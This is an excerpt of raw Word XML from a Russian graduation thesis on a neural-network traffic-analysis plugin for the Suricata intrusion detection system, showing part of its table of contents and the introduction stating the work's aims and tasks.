            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EC29770" w14:textId="2084F609" w:rsidR="000B2212" w:rsidRPr="000B2212" w:rsidRDefault="000B2212" w:rsidP="000B2212">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="968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31673288" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>3 Разработка и тестирование нейросетевого модуля</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_Toc231673288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49</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A38506B" w14:textId="4519DB81"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89" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>3.1 Формирование и подготовка датасета</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_Toc231673289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49</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D720392" w14:textId="7A1E4EC2"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90" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>3.2 Обучение и валидация нейросетевой модели на реальном и синтетическом трафике</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_Toc231673290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53</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59FFC4B0" w14:textId="29186895"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91" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>3.3 Проверка собственных механизмов безопасности</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_Toc231673291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55</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44298D2C" w14:textId="0C322F77"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92" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>3.4 Тестирование эффективности плагина</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_Toc231673292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60</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0919A6C8" w14:textId="2F18F9F6" w:rsidR="000B2212" w:rsidRPr="000B2212" w:rsidRDefault="000B2212" w:rsidP="000B2212">
          <w:pPr>
            <w:pStyle w:val="23"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9685"/>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1673293" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>3.5 Сравнительный анализ результатов работы классической Suricata и Suricata с нейросетевым плагином</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_Toc231673293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90</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="381FF94F" w14:textId="0C8B5847" w:rsidR="000B2212" w:rsidRPr="000B2212" w:rsidRDefault="000B2212" w:rsidP="000B2212">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="968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31673294" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Заключение</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_Toc231673294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95</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DAC1D72" w14:textId="4B20D8A2" w:rsidR="000B2212" w:rsidRPr="000B2212" w:rsidRDefault="000B2212" w:rsidP="000B2212">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9685"/>
            </w:tabs>
            <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:eastAsia="ru-RU"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231673295" w:history="1">
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rStyle w:val="af"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Список использованной литературы</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231673295 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000902B7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>97</w:t>
            </w:r>
            <w:r w:rsidRPr="000B2212">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21FDC60D" w14:textId="0EF27EC6" w:rsidR="00230C61" w:rsidRDefault="00230C61" w:rsidP="000B2212">
          <w:pPr>
            <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
            <w:jc w:val="both"/>
          </w:pPr>
          <w:r w:rsidRPr="000B2212">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="113E88EE" w14:textId="15811889" w:rsidR="00FA5930" w:rsidRDefault="00FA5930" w:rsidP="000001E1">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sectPr w:rsidR="00FA5930" w:rsidSect="00891157">
          <w:headerReference w:type="default" r:id="rId13"/>
          <w:footerReference w:type="default" r:id="rId14"/>
          <w:headerReference w:type="first" r:id="rId15"/>
          <w:footerReference w:type="first" r:id="rId16"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="851" w:right="680" w:bottom="3260" w:left="1531" w:header="0" w:footer="57" w:gutter="0"/>
          <w:pgNumType w:start="6"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA69585" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00B94E2A" w:rsidRDefault="008E0171" w:rsidP="009D45A4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc214614005"/>
      <w:bookmarkStart w:id="1" w:name="_Toc230947682"/>
      <w:bookmarkStart w:id="2" w:name="_Toc231673277"/>
      <w:r w:rsidRPr="00B94E2A">
        <w:lastRenderedPageBreak/>
        <w:t>Введение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="0DC2D993" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="004E165A" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-142" w:right="-85" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0721901B" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00D807C6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D807C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Современные корпоративные сети, особенно в организациях, осуществляющих разработку и сопровождение программных продуктов, характеризуются высоким уровнем сложности обмена данными между узлами. В таких условиях возрастает риск кибератак, направленных на получение несанкционированного доступа к информационным ресурсам, нарушение работоспособности сервисов или компрометацию конфиденциальных данных. Актуальность проблемы усиливается в связи с увеличением числа целевых атак, использующих скрытые каналы связи, шифруемые протоколы и методы маскировки активности под легитимный трафик.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA21C06" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00D807C6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D807C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Традиционные средства защиты, в частности</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D807C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сигнатурные антивирусные системы и классические системы обнаружения вторжений, обеспечивают базовый уровень безопасности, однако не обладают достаточной эффективностью для обнаружения ранее неизвестных, адаптивных и малошумных угроз. Сигнатурные механизмы выявляют только те атаки, которые уже имеют формализованные признаки, а поведенческие правила трудоёмки в настройке и часто приводят к большому числу ложных срабатываний. Это создаёт необходимость применения методов интеллектуального анализа данных, способных распознавать сложные закономерности и аномалии в сетевом трафике.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F19DF35" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00D807C6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D807C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Одним из перспективных решений является использование искусственных нейронных сетей в составе систем обнаружения вторжений. Нейронные модели способны обрабатывать значительные объёмы сетевых данных, выявлять скрытые взаимосвязи в последовательностях событий и строить модель нормального поведения сети, характерную для конкретной организации. Появление общедоступных наборов данных позволяет формировать обучающие выборки, включающие как нормальный трафик, так и разнообразные сценарии атак, что делает исследования в этой области практически осуществимыми.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E94C39A" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00D807C6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D807C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>В данной работе рассматривается возможность применения искусственных нейронных сетей для повышения эффективности обнаружения сетевых атак. Исследование включает анализ современных систем обнаружения вторжений, определение их функциональных ограничений и выявление классов угроз, требующих использования более сложных методов анализа. На основе открытых датасетов и выбранных архитектур ИНС предполагается построить и обучить модель, способную выделять аномальные паттерны сетевой активности. Практическая значимость работы будет подтверждена тестированием прототипа в изолированной среде. Результаты исследования позволят сформировать научно обоснованные выводы о целесообразности и эффективности использования нейросетевых подходов в корпоративных системах мониторинга безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C20D280" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00D807C6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D807C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Область исследования посвящена применению искусственных нейронных сетей в системах обнаружения вторжений для корпоративных сетей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62382D06" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00D807C6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D807C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Объектом исследования являются методы и подходы к построению нейросетевых моделей для анализа сетевого трафика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202425AF" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00D807C6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D807C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Предметом исследования выступают архитектуры, алгоритмы и методы интеграции искусственных нейронных сетей с классическими системами обнаружения вторжений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C670A2" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00D807C6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D807C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Целью выпускной квалификационной работы является исследование, разработка и экспериментальная оценка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>плагина</w:t>
      </w:r>
      <w:r w:rsidRPr="00D807C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> интеллектуального анализа трафика на базе искусственных нейронных сетей, направленного на повышение эффективности выявления угроз в корпоративных сетях. Работа выполняется в контексте потенциального применения в среде компании-разработчика программного обеспечения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DBCA52" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00D807C6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D807C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Для достижения поставленной цели необходимо решить следующие задачи:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ED92F7" w14:textId="073625A2" w:rsidR="008E0171" w:rsidRDefault="005A1278" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidR="009E371C" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ровести а</w:t>
      </w:r>
      <w:r w:rsidR="007A5439" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нализ типовых архитектур корпоративных сетей и структуры данных</w:t>
      </w:r>
      <w:r w:rsidR="007A5439" w:rsidRPr="007A5439">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> СОВ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A5439" w:rsidRPr="007A5439">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2BEC23" w14:textId="1B8E242B" w:rsidR="008E0171" w:rsidRPr="00546173" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546173">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1B00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>азработать модель нарушителя и угроз</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1B00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> выделив классы атак</w:t>
      </w:r>
